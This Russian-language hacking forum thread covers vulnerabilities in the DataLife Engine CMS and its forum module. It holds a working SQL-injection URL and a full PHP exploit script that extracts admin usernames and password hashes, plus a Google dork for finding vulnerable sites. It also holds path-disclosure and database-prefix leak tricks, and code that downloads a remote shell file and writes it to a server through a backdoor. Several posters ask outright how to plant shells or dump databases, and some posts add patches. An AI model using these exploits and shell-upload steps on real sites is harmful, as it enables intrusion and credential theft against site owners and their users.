Раскрытие путей dle 8.3 engine/images.php dle_skin: ../ Code: if ($_COOKIE['dle_skin']) { if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) { $config['skin'] = $_COOKIE['dle_skin']; } } Открываем site.ru/engine/images.php?area=short_story&add_id= грузим картинку и получаем раскрытые пути)
Уже обговаривали выше это момент. Что там нету этих конопок. и вообщше нету новостей. ДЛЕ передалан в мощный портал.
engine/inc/include/init.php?selected_language= cрабатывает вот этот експлоит Warning: require_once(ENGINE_DIR/inc/include/functions.inc.php) [function.require-once]: failed to open stream: No such file or directory in S:\home\192.168.2.1\www\engine\inc\include\init.php on line 19 Fatal error: require_once() [function.require]: Failed opening required 'ENGINE_DIR/inc/include/functions.inc.php' (include_path='.;/usr/local/php5/PEAR') in S:\home\192.168.2.1\www\engine\inc\include\init.php on line 19 подскажите что можно дальше зделать? и можно ли залить шелл или так слить базу зарние спс
1. В 8.3 Пофиксили ; 2. Это раскрытие путей. Может пригодится только если ты зальешь шелл через соседей. Для того что бы найти путь
Не только. Если помимо DLE на сайте присутствует другой движок, в котором присутствует скуля, то есть вероятность залить шелл через INTO OUTFILE, в чем и поможет раскрытие путей.
Ребят а подскажите как узнать версию Dle ? admin.php не помогло сразу говорю,что там нет ни каких картинок с версией в ней
Вот софтина сканнер dle сайтов с встроенным бекдором сборки от злого Нужна база сайтов которых в паблике навалом.. Скачать В архиве сканнер и кейген для него Покупал за 15$ , потому выкласть не жалко... На базе 16000 сайтов нашёл 6 бекдоров Версия DLE 8.2-8.5 Сканнер можна настроить под любую ссылку бекдора если надо.. Скорость: 2-3 сайта в сек. (1мбит) Сам бекдор выполняет любой PHP код, потому залить шелл не составит труда Берём хостинг. Туда текстовик с шеллом вида shell.txt Идём в бекдор. Пишем $shell = file_get_contents("http://site/shell.txt"); $fp = fopen("shell.php", a); fwrite($fp, $shell); fclose($fp);
Проблема: Недостаточная фильтрация входящих данных в регистрации. Ошибка в версии: все версии Степень опасности: Низкая Баг нашёл: Lion__ Баг позволяет узнать префикс к бд. Как юзать: 1) Переходим по ссылке ?do=register 2) Вводим логин, пароль, капчу, email более 50 символов. Пример email: qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrftg@qawsedrftg.qawsedrftg 3) Нажимаем зарегистрироваться 4) Повторяем операцию с 1 по 3 шаги. 5) Получаем ошибку о дубликате поля. В ней смотрим префикс к бд. Как это работает? Дело в том что поле email стоит ограничение в 50 символов, таким образом остальное всё обрезается, при первой регистрации в бд попало значение: qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft После второй регистрации идёт поиск поля email со значением: qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrftg@qawsedrftg.qawsedrftg Которого нет, отправляется запрос, получаем ошибку. Исправить: Найти в engine/modules/register.php: $email = $db->safesql( $parse->process( $_POST['email'] ) ); Заменить на: $email = $db->safesql( $parse->process( substr($_POST['email'], 0,50) ) ); Источник: _http://forum.seo-king.ru/index.php?showtopic=377 должно получиться это:
dle forum 2.4 sql inj Sql-inj в dle-forum*е 2.4 была найдена мной , ещё месяца 2 назат) решил выложить , т.к. сайтов ещё много дырявых. site.ru/?do=forum&showtopic=23%2527+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- юзаем так ... Защищаемся: открываем файл: engine/forum/sources/components/init.php 446 строка PHP: .... if ($_REQUEST['category']) { $act = 'category'; $cid =$_REQUEST['category']; $t_act = '?c'.$cid; } if ($_REQUEST['showforum']) { $act = 'forum'; $fid = $_REQUEST['showforum']; $t_act = '?f'.$fid; } if ($_REQUEST['showtopic']) { $act = 'topic'; $tid = $_REQUEST['showtopic']; $t_act = '?t'.$tid; } ...... заменяем на PHP: ...... if ($_REQUEST['category']) { $act = 'category'; $cid = intval($_REQUEST['category']); $t_act = '?c'.$cid; } if ($_REQUEST['showforum']) { $act = 'forum'; $fid = intval($_REQUEST['showforum']); $t_act = '?f'.$fid; } if ($_REQUEST['showtopic']) { $act = 'topic'; $tid = intval($_REQUEST['showtopic']); $t_act = '?t'.$tid; } ..... вот типа сплоит писал месяца 2 назат для себя. PHP: <form method="POST" > Введи сайт "например" "<b>alldle.ru</b>" <input type="text" name="site" value="<?=$_POST['site']?>"> лимит вводить если показало mysql error<input type="text" name="lim" value="<?=$_POST['lim']?>"> <input type="submit" value="send"> </form> <?php if (!empty($_POST['site'])){ $lim="1"; if (!empty($_POST['lim'])){$lim ="{$_POST['lim']},";$lim .=$_POST['lim'];} $url='http://'.$_POST['site'].'/?do=forum&showtopic=23%2527+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+'.$lim.'--'; $ua='Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10'; $cu=curl_init($url); curl_setopt($cu,CURLOPT_HEADER, 0); curl_setopt($cu,CURLOPT_RETURNTRANSFER, 1); curl_setopt($cu,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cu,CURLOPT_USERAGENT, $ua); $log=curl_exec($cu); $log=html_entity_decode($log); if (preg_match_all('#<title>(.*)» (.*)</title>#i',$log,$log2)){ $ss=$log2[2][0]; if (!preg_match('#[:]#is',$ss,$loggg)){ echo 'нету баги ';exit;} $save=explode(':',$ss); echo " <b>site:</b> <font color='green'> ".$_POST['site']."</font><br>"; echo " <b>name:</b> <font color='red'> ".$save[0]."</font><br>"; echo "<b>pass:</b> <font color='blue'> ".$save[1]."</font><br>"; } else { echo " баги не найдено =( ";preg_match_all('#<title>(.*)</title>#i',$log,$logi); echo "<b>{$logi[1][0]}</b>";} curl_close($cu); } ?> (c) dark_cracker dork: inurl:/forum/ intextLE Forum v.2.4 © 2010 Pocketx.Ru
Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки... http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html
В 8.3, может и раньшых! вывод какие модули стоят. Файл http://localhost/engine/ajax/antivirus.php Вывод список! Защищаемся На начало добавить PHP: if(!defined('DATALIFEENGINE')) { die("You lol! Anatole yzhe tut"); }
В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг. Сам лично юзаю PHP - Fusion.
